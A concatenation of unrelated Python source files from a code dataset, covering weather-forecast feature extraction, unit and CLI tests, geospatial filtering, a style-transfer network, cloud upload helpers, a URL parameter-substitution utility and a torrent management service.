lats_group = nwp['lat'][lats]
longs_group = nwp['long'][:, longs]
flag = True
break
except:
continue
if flag:
break
X = self.dataset_for_multiple_farms_online(data, self.areas, lats_group, longs_group)
return X, X_3d
def get_3d_dataset_online(self, utc):
def datetime_exists_in_tz(dt, tz):
try:
dt.tz_localize(tz)
return True
except:
return False
dates_stack = []
if utc:
pdates = pd.date_range(self.dates + pd.DateOffset(hours=25), self.dates + pd.DateOffset(hours=48), freq='H')
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates if dt in self.data.index]
dates_stack.append(dates)
else:
pdates = pd.date_range(self.dates + pd.DateOffset(hours=25), self.dates + pd.DateOffset(hours=48), freq='H')
indices = [i for i, t in enumerate(pdates) if datetime_exists_in_tz(t, tz=timezone('Europe/Athens'))]
pdates = pdates[indices]
pdates = pdates.tz_localize(timezone('Europe/Athens'))
pdates = pdates.tz_convert(timezone('UTC'))
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates]
dates_stack.append(dates)
if not isinstance(self.areas, dict):
arrays = stack_daily_nwps(self.dates, dates_stack[0], self.path_nwp_project, self.nwp_model, self.areas, self.variables, self.compress, self.static_data['type'])
else:
arrays = stack_daily_nwps(self.dates, dates_stack[0], self.path_nwp_project, self.nwp_model, self.area_group,
self.variables, self.compress, self.static_data['type'])
X = np.array([])
data_var = dict()
for var in self.variables:
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
data_var[var+'_prev'] = X
data_var[var] = X
data_var[var+'_next'] = X
else:
data_var[var] = X
data_var['dates'] = X
X_3d = np.array([])
nwp = arrays[0]
x_2d = arrays[1]
if x_2d.shape[0]!=0:
for var in nwp.keys():
if var != 'dates':
data_var[var] = stack_3d(data_var[var], nwp[var])
else:
data_var[var] = np.hstack((data_var[var], nwp[var]))
X_3d = stack_3d(X_3d, x_2d)
self.logger.info('NWP data stacked for date %s', arrays[2])
return data_var, X_3d
def dataset_for_single_farm_online(self, data):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat(
[dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour', 'month'])])
for var in self.variables:
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = np.transpose(data[var + '_prev'],[0, 2, 1])
X0_level0 = X0[:, 2, 2]
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = np.transpose(data[var + '_next'],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'flux' if var=='Flux' else 'wind'
var_sort = 'fl' if var=='Flux' else 'ws'
col = ['p_' + var_name] + ['n_' + var_name] + [var_name]
col = col + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X0_level0.reshape(-1, 1), X2_level0.reshape(-1, 1), X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud' if var=='Cloud' else 'direction'
var_sort = 'cl' if var=='Cloud' else 'wd'
col = [var_name] + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X2 = np.transpose(data[var],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'Temp' if var == 'Temperature' else 'wind'
var_sort = 'tp' if var == 'Temperature' else 'ws'
col = [var_name]
X = X2_level0
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
dataset_X = dataset_X
self.logger.info('Successfully dataset created for training for %s', self.project_name)
return dataset_X
def dataset_for_multiple_farms_online(self, data, areas, lats_group, longs_group):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat([dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour','month'])])
for var in self.variables:
for area_name, area in areas.items():
lats = (np.where((lats_group[:, 0] >= area[0]) & (lats_group[:, 0] <= area[2])))[0]
longs = (np.where((longs_group[0, :] >= area[1]) & (longs_group[0, :] <= area[3])))[0]
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = data[var + '_prev'][:, lats, :][:, :, longs]
X0 = X0.reshape(-1, X0.shape[1] * X0.shape[2])
level = var + '_prev_' + area_name
self.logger.info('Begin PCA training for %s', level)
X0_compressed = self.PCA_transform(X0, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = data[var + '_next'][:, lats, :][:, :, longs]
X2 = X2.reshape(-1, X2.shape[1] * X2.shape[2])
level = var + '_next_' + area_name
self.logger.info('Begin PCA training for %s', level)
X2_compressed = self.PCA_transform(X2, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'flux_' + area_name if var=='Flux' else 'wind_' + area_name
var_sort = 'fl_' + area_name if var=='Flux' else 'ws_' + area_name
col = ['p_' + var_name + '.' + str(i) for i in range(3)]
col += ['n_' + var_name + '.' + str(i) for i in range(3)]
col += [var_name + '.' + str(i) for i in range(9)]
X = np.hstack((X0_compressed, X2_compressed, X1_compressed))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud_' + area_name if var=='Cloud' else 'direction_' + area_name
var_sort = 'cl_' + area_name if var=='Cloud' else 'wd_' + area_name
col = [var_name + '.' + str(i) for i in range(9)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
var_sort = 'tp_' + area_name if var == 'Temperature' else 'ws_' + area_name
col = [var_name + '.' + str(i) for i in range(3)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
for var in self.variables:
if ((var == 'WS') and (self.static_data['type'] == 'wind')) or (
(var == 'Flux') and (self.static_data['type'] == 'pv')):
col = []
col_p = []
col_n = []
for area_name, area in areas.items():
var_name = 'flux_' + area_name if var == 'Flux' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
col_p += ['p_' + var_name + '.' + str(i) for i in range(3)]
col_n += ['n_' + var_name + '.' + str(i) for i in range(3)]
var_name = 'flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
var_name = 'p_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_p].mean(axis=1)
var_name = 'n_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_n].mean(axis=1)
elif var in {'WD', 'Cloud'}:
col = []
for area_name, area in areas.items():
var_name = 'cloud_' + area_name if var == 'Cloud' else 'direction_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
var_name = 'cloud' if var == 'Cloud' else 'direction'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type'] == 'pv')):
col = []
for area_name, area in areas.items():
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(3)]
var_name = 'Temp' if var == 'Temperature' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
self.logger.info('Successfully dataset created for training for %s', self.project_name)
return dataset_X | StarcoderdataPython |
1847391 | <reponame>nathanielsimard/improving-fs-ssl
import unittest
from mcp.data.dataset.dataset import (
ComposedDataset,
ListDataset,
create_few_shot_datasets,
)
from tests.helpers.dataset import (
create_random_dataset,
item_equal,
unique_classes,
unique_samples,
)
NUM_ITEMS = 100
NUM_CLASSES = 10
SHAPE = (24, 24)
class ComposedDatasetTest(unittest.TestCase):
def setUp(self):
samples = create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE).samples # type: ignore
self.dataset_1 = ListDataset(samples[0:20])
self.dataset_2 = ListDataset(samples[20:40])
self.dataset_3 = ListDataset(samples[70:100])
self.composed_dataset = ComposedDataset(
[self.dataset_1, self.dataset_2, self.dataset_3]
)
def test_shouldContainsAllItems(self):
dataset = ListDataset(
self.dataset_1.samples + self.dataset_2.samples + self.dataset_3.samples
)
for index in range(len(dataset)):
self.assertTrue(item_equal(self.composed_dataset[index], dataset[index]))
def test_shouldSupportNegativeIndex(self):
dataset = ListDataset(
self.dataset_1.samples + self.dataset_2.samples + self.dataset_3.samples
)
for i in range(len(dataset)):
index = -(i + 1)
self.assertTrue(item_equal(self.composed_dataset[index], dataset[index]))
def test_whenIndexToBig_shouldRaise(self):
datasets = [
create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE),
create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE),
]
dataset = ComposedDataset(datasets)
self.assertRaises(ValueError, lambda: dataset[200])
self.assertRaises(ValueError, lambda: dataset[201])
self.assertRaises(ValueError, lambda: dataset[-201])
class FewShotDatasetTest(unittest.TestCase):
def test_shouldKeepAllSamples(self):
dataset = create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE)
train_dataset, test_dataset = create_few_shot_datasets(dataset, 5)
self.assertEqual(NUM_ITEMS, len(train_dataset) + len(test_dataset))
def test_shouldNotHaveDupplicatedSamples(self):
dataset = create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE)
train_dataset, test_dataset = create_few_shot_datasets(dataset, 5)
samples = unique_samples([train_dataset, test_dataset])
self.assertEqual(len(samples), len(train_dataset) + len(test_dataset))
def test_givenOneNumSample_trainDatasetShouldHaveOneSamplePerClass(self):
dataset = create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE)
train_dataset, test_dataset = create_few_shot_datasets(dataset, 1)
classes_train = unique_classes(train_dataset)
self.assertEqual(len(train_dataset), NUM_CLASSES)
self.assertEqual(len(classes_train), NUM_CLASSES)
def test_given5NumSamples_trainDatasetShouldHave5SamplesPerClass(self):
num_samples = 5
# We add more items to make sure all classes are included
dataset = create_random_dataset(NUM_ITEMS * num_samples, NUM_CLASSES, SHAPE)
train_dataset, test_dataset = create_few_shot_datasets(dataset, num_samples)
classes_train = unique_classes(train_dataset)
self.assertEqual(len(train_dataset), num_samples * NUM_CLASSES)
self.assertEqual(len(classes_train), NUM_CLASSES)
| StarcoderdataPython |
5098809 | from unittest import TestCase
from src.validationlib.validation import greaterThenZero, greaterOrEqualThenZero, validInt, validFloat
class TestValidationLib(TestCase):
def test_greater_than_zero_return_false(self):
assert greaterThenZero(0) == False
def test_greater_than_zero_return_true(self):
assert greaterThenZero(1) == True
def test_greater_or_equal_than_zero_return_false(self):
assert greaterOrEqualThenZero(-1) == False
def test_greater_or_equal_than_zero_return_true(self):
assert greaterOrEqualThenZero(0) == True
def test_valid_int_return_false(self):
assert validInt('1') == False
def test_valid_int_return_true(self):
assert validInt(1) == True
def test_valid_float_return_true_with_int(self):
assert validFloat(5) == True
def test_valid_float_return_true(self):
assert validFloat(10.2) == True | StarcoderdataPython |
150272 | """ Tests for seed_services_cli.identity_store """
from unittest import TestCase
from click.testing import CliRunner
from seed_services_cli.main import cli
import responses
import json
class TestSendCommand(TestCase):
def setUp(self):
self.runner = CliRunner()
def tearDown(self):
pass
def invoke_user_add(self, args, first_name="First", last_name="Last",
email="<EMAIL>", password="<PASSWORD>",
admin=False):
if admin:
args = args + ["--admin"]
return self.runner.invoke(cli, [
'auth-user-add',
'--first_name', first_name,
'--last_name', last_name,
'--email', email,
'--password', password,
] + args)
def invoke_user_change_password(self, args, email, password):
return self.runner.invoke(cli, [
'auth-user-change-password',
'--email', email,
'--password', password,
] + args)
def invoke_user_add_team(self, args, user=2, team=3):
return self.runner.invoke(cli, [
'auth-user-add-team',
'--user', user,
'--team', team,
] + args)
def test_user_add_help(self):
result = self.runner.invoke(cli, ['auth-user-add', '--help'])
self.assertEqual(result.exit_code, 0)
self.assertTrue(
"Create a user"
in result.output)
@responses.activate
def test_user_add_no_details(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
result = self.runner.invoke(cli, ['auth-user-add'])
self.assertEqual(result.exit_code, 2)
self.assertTrue(
"Please specify all new user information. See --help."
in result.output)
@responses.activate
def test_user_add(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
user_response = {
"id": "3",
"url": "http://auth.example.org/users/9/",
"first_name": "First",
"last_name": "Last",
"email": "<EMAIL>",
"admin": False,
"teams": [],
"organizations": [],
"active": False
}
responses.add(responses.POST,
"http://auth.example.org/users/",
json=user_response, status=200)
# Execute
result = self.invoke_user_add([])
# Check
self.assertEqual(result.exit_code, 0)
self.assertTrue("Creating account for <EMAIL>"
in result.output)
self.assertTrue("Created user. ID is 3." in result.output)
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[1].request.url,
"http://auth.example.org/users/")
@responses.activate
def test_user_add_admin(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
user_response = {
"id": "3",
"url": "http://auth.example.org/users/9/",
"first_name": "First",
"last_name": "Last",
"email": "<EMAIL>",
"admin": False,
"teams": [],
"organizations": [],
"active": True
}
responses.add(responses.POST,
"http://auth.example.org/users/",
json=user_response, status=200)
# Execute
result = self.invoke_user_add([], admin=True)
# Check
self.assertEqual(result.exit_code, 0)
self.assertTrue("Creating account for <EMAIL>"
in result.output)
self.assertTrue("Created user. ID is 3." in result.output)
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[1].request.url,
"http://auth.example.org/users/")
@responses.activate
def test_user_change_password(self):
login_response = {
"token": "<PASSWORD>"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
users_response = [{
'email': '<EMAIL>',
}, {
'id': 2,
'email': '<EMAIL>'
}]
responses.add(responses.GET,
"http://auth.example.org/users/",
json=users_response, status=200)
responses.add(responses.PUT,
"http://auth.example.org/users/2/",
json={}, status=200)
result = self.invoke_user_change_password(
[], email='<EMAIL>', password='<PASSWORD>')
self.assertEqual(result.exit_code, 0)
self.assertTrue(
'Changing password for <EMAIL>' in result.output)
self.assertEqual(len(responses.calls), 3)
self.assertEqual(
json.loads(responses.calls[2].request.body)['password'],
'<PASSWORD>')
def test_user_add_team_help(self):
result = self.runner.invoke(cli, ['auth-user-add-team', '--help'])
self.assertEqual(result.exit_code, 0)
self.assertTrue(
"Add a user to a team"
in result.output)
@responses.activate
def test_user_add_user_team_no_details(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
result = self.runner.invoke(cli, ['auth-user-add-team'])
self.assertEqual(result.exit_code, 2)
self.assertTrue(
"Please specify user and team. See --help."
in result.output)
| StarcoderdataPython |
6517123 | # -*- coding: utf-8 -*-
import pandas as pd
import geopandas as gpd
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import descartes
import jellyfish
from shapely import geometry
from shapely.geometry import Point
from shapely.geometry.polygon import Polygon
def get_agricultural_moughataa():
file_moughataa_new = './Moughataas_new.geojson'
file_zone_me = "./Zones de moyen d'existence.geojson"
moughataa = gpd.read_file(file_moughataa_new)
zone_me = gpd.read_file(file_zone_me)
area_culture_polygon = zone_me[zone_me['LZNUM'] == 9].geometry
for i in range(len(moughataa.index)):
moughataa_polygon = moughataa.loc[i, 'geometry']
intersect = area_culture_polygon.intersection(moughataa_polygon)
if intersect.is_empty.iloc[0]:
moughataa.loc[i, 'in_culture_area'] = False
else:
moughataa.loc[i, 'in_culture_area'] = True
moughataa_selected = moughataa[moughataa['in_culture_area'] == True]
list_moughataa_selected = list(moughataa_selected['X.1'])
return(list_moughataa_selected)
def get_agricultural_commune():
file_commune = './Communes.geojson'
file_zone_me = "./Zones de moyen d'existence.geojson"
commune = gpd.read_file(file_commune)
zone_me = gpd.read_file(file_zone_me)
area_culture_polygon = zone_me[zone_me['LZNUM'] == 9].geometry
for i in range(len(commune.index)):
commune_polygon = commune.loc[i, 'geometry']
intersect = area_culture_polygon.intersection(commune_polygon)
if intersect.is_empty.iloc[0]:
commune.loc[i, 'in_culture_area'] = False
else:
commune.loc[i, 'in_culture_area'] = True
commune_selected = commune[commune['in_culture_area'] == True]
commune_selected = list(commune_selected['NAME_3'])
return(commune_selected)
| StarcoderdataPython |
3461257 | <reponame>tinyos-io/tinyos-3.x-contrib
def map_cc2420 (power):
"""
Map power levels for the cc2420 radio onto a gain.
"""
raise NotImplementedError
def map_normalized_direct (power):
"""
Map power levels such that a value of X is (X - 127) dBm.
Thus, the maximum level is 0 dBm (when power is 127) and the
minimum level is -127 dBm (when power is 0).
"""
return power - 127
def bootstrapTxPower (tx_power, dyn_topo, power_map=map_normalized_direct):
"""
Create linkings between a TxPower object and a DynTopo object.
"""
def power_change (mote_id, power):
try:
gain = power_map(power)
# print "Mote %d changed power to %d (%d)" % (mote_id, power, gain)
n = dyn_topo.getNode(mote_id)
n.set_txgain(gain)
except:
print "Error changing power"
finally:
return power
def power_inspect (mote_id):
try:
# print "Mote %d inspected power" % mote_id
n = dyn_topo.getNode(mote_id)
except:
print "Error inspecting power"
finally:
return n.ro_txgain
tx_power.setChangeFunction(power_change)
tx_power.setInspectFunction(power_inspect)
| StarcoderdataPython |
169180 | from jeweler.bracelet import bracelet_fc
def test_bracelet_fc():
help(bracelet_fc)
result = bracelet_fc(6, 3, [1, 2, 3])
print(type(result))
for i in result:
print(i)
print()
del result[2:]
for i in result:
print(i)
if __name__ == "__main__":
test_bracelet_fc()
| StarcoderdataPython |
1850326 | <reponame>Abdulrahman-Kamel/exurl<gh_stars>1-10
from urllib.parse import urlsplit,parse_qs
# Function take url and return params with this format => {'paramName': ['value'], 'age': ['33'], 'name': ['dekart']}
def query(url):
query = urlsplit(url).query
params = parse_qs(query)
return params
# Function take query format data and return just params value in list
def params_value(dct):
params_value_list = []
for param,value in dct.items():
params_value_list.append(value[0])
return params_value_list
# Function take [url, replacedData] and return urls split
def split_url(url, replaceMe):
split_urls_list = []
params_value_list = []
params_value_url = params_value(query(url))
# [2]- for loop to enter in params value and replace
for param_value in params_value_url:
chob = url.replace(param_value, replaceMe)
split_urls_list.append(chob)
return split_urls_list
# Function take [url, replacedData] and return urls split
def split_urls(urls, replaceMe):
split_urls_list = []
params_value_list = []
# [1]- for loop to enter in urls list
for url in urls:
params_value_url = params_value(query(url))
# [2]- for loop to enter in params value and replace
for param_value in params_value_url:
chob = url.replace(param_value, replaceMe)
split_urls_list.append(chob)
return split_urls_list | StarcoderdataPython |
8143590 | import sys
from setuptools import setup, find_packages
from winrmcp import __version__, __description__, __author__, __author_email__, __url__
with open('README.md') as f:
long_description = f.read()
setup(
name = 'winrmcp',
version = __version__,
description = __description__,
author = __author__,
author_email= __author_email__,
long_description=long_description,
long_description_content_type='text/markdown',
url = __url__,
license ='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=find_packages(),
python_requires='>=3.6',
install_requires=['pywinrm'],
extras_require={ # from pywinrm's setup.py
'credssp': ['requests-credssp>=1.0.0'],
'kerberos:sys_platform=="win32"': ['winkerberos>=0.5.0'],
'kerberos:sys_platform!="win32"': ['pykerberos>=1.2.1,<2.0.0']
},
)
| StarcoderdataPython |
3595493 | import torch
from collections import namedtuple
from torchvision import models
import torch.nn as nn
import torch.nn.functional as F
class TransformerNet(torch.nn.Module):
def __init__(self):
super(TransformerNet, self).__init__()
self.model = nn.Sequential(
ConvBlock(3, 32, kernel_size=9, stride=1),
ConvBlock(32, 64, kernel_size=3, stride=2),
ConvBlock(64, 128, kernel_size=3, stride=2),
ResidualBlock(128),
ResidualBlock(128),
ResidualBlock(128),
ResidualBlock(128),
ResidualBlock(128),
ConvBlock(128, 64, kernel_size=3, upsample=True),
ConvBlock(64, 32, kernel_size=3, upsample=True),
ConvBlock(32, 3, kernel_size=9, stride=1, normalize=False, relu=False),
)
def forward(self, x):
return self.model(x)
class ResidualBlock(torch.nn.Module):
def __init__(self, channels):
super(ResidualBlock, self).__init__()
self.block = nn.Sequential(
ConvBlock(channels, channels, kernel_size=3, stride=1, normalize=True, relu=True),
ConvBlock(channels, channels, kernel_size=3, stride=1, normalize=True, relu=False),
)
def forward(self, x):
return self.block(x) + x
class ConvBlock(torch.nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, upsample=False, normalize=True, relu=True):
super(ConvBlock, self).__init__()
self.upsample = upsample
self.block = nn.Sequential(
nn.ReflectionPad2d(kernel_size // 2), nn.Conv2d(in_channels, out_channels, kernel_size, stride)
)
self.norm = nn.InstanceNorm2d(out_channels, affine=True) if normalize else None
self.relu = relu
def forward(self, x):
if self.upsample:
x = F.interpolate(x, scale_factor=2)
x = self.block(x)
if self.norm is not None:
x = self.norm(x)
if self.relu:
x = F.relu(x)
return x
| StarcoderdataPython |
241699 | <filename>src/cloud.py
#! /usr/bin/env python
# Copyright 2016 WebAssembly Community Group participants
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import proc
CLOUD_STORAGE_BASE_URL = 'https://storage.googleapis.com/'
CLOUD_STORAGE_PATH = 'wasm-llvm/builds/'
def Upload(local, remote):
"""Upload file to Cloud Storage."""
if not os.environ.get('BUILDBOT_BUILDERNAME'):
return
remote = CLOUD_STORAGE_PATH + remote
proc.check_call(
['gsutil.py', 'cp', '-a', 'public-read', local, 'gs://' + remote])
return CLOUD_STORAGE_BASE_URL + remote
def Copy(copy_from, copy_to):
"""Copy from one Cloud Storage file to another."""
if not os.environ.get('BUILDBOT_BUILDERNAME'):
return
copy_from = CLOUD_STORAGE_PATH + copy_from
copy_to = CLOUD_STORAGE_PATH + copy_to
proc.check_call(
['gsutil.py', 'cp', '-a', 'public-read',
'gs://' + copy_from, 'gs://' + copy_to])
return CLOUD_STORAGE_BASE_URL + copy_to
def Download(remote, local):
remote = CLOUD_STORAGE_PATH + remote
proc.check_call(
['gsutil.py', 'cp', 'gs://' + remote, local])
| StarcoderdataPython |
11257473 | import asyncio
import logging
import signal
from asyncio import FIRST_COMPLETED
from collections import OrderedDict
from io import BytesIO
from pathlib import Path
from typing import (
Set,
MutableSequence,
Mapping,
Tuple,
Sequence,
MutableMapping,
Optional,
cast,
Iterable,
AsyncGenerator,
)
from urllib.parse import urlparse
from clutchless.domain.torrent import MetainfoFile
from clutchless.external.metainfo import (
MetainfoIO,
TorrentData,
TorrentDataLocator,
)
from clutchless.external.result import QueryResult, CommandResult
from clutchless.external.transmission import TransmissionApi
logger = logging.getLogger(__name__)
class AddService:
def __init__(self, api: TransmissionApi):
self.api = api
self.success: MutableSequence[MetainfoFile] = []
self.added_without_data: MutableSequence[MetainfoFile] = []
# these are added together (if linking)
# found -> metainfo file path
self.found: MutableSequence[MetainfoFile] = []
# link -> data location path
self.link: MutableSequence[Path] = []
# these are added together
self.fail: MutableSequence[MetainfoFile] = []
self.error: MutableSequence[str] = []
def add(self, file: MetainfoFile):
path = cast(Path, file.path)
result = self.api.add_torrent(path)
if result.success:
self.success.append(file)
self.added_without_data.append(file)
else:
self.fail.append(file)
self.error.append(result.error or "empty error string")
def add_with_data(self, file: MetainfoFile, data_path: Path):
path = cast(Path, file.path)
result = self.api.add_torrent_with_files(path, data_path)
if result.success:
self.success.append(file)
self.found.append(file)
self.link.append(data_path)
else:
self.fail.append(file)
self.error.append(result.error or "empty error string")
class LinkOnlyAddService(AddService):
def add(self, path: Path):
pass
class FindService:
def __init__(self, data_locator: TorrentDataLocator):
self.data_locator = data_locator
async def find_async(
self, files: Set[MetainfoFile]
) -> AsyncGenerator[TorrentData, None]:
pending = {asyncio.create_task(self.data_locator.find(file)) for file in files}
logger.info(f"{pending}")
while pending:
try:
logger.info(f"pre-await {pending}")
done, pending = await asyncio.wait(pending, return_when=FIRST_COMPLETED)
logger.info(f"post-wait {done, pending}")
while done:
d = done.pop()
logger.info(f"yielding result {d}")
yield d.result()
except (GeneratorExit, asyncio.CancelledError) as e:
logger.info(f"exiting find_async {type(e)}")
for task in pending:
task.cancel()
for task in pending:
await task
yield task.result()
break
def find_blocking(
self, files: Set[MetainfoFile], timeout: float
) -> Iterable[TorrentData]:
async def _wait():
coros = [self.data_locator.find(file) for file in files]
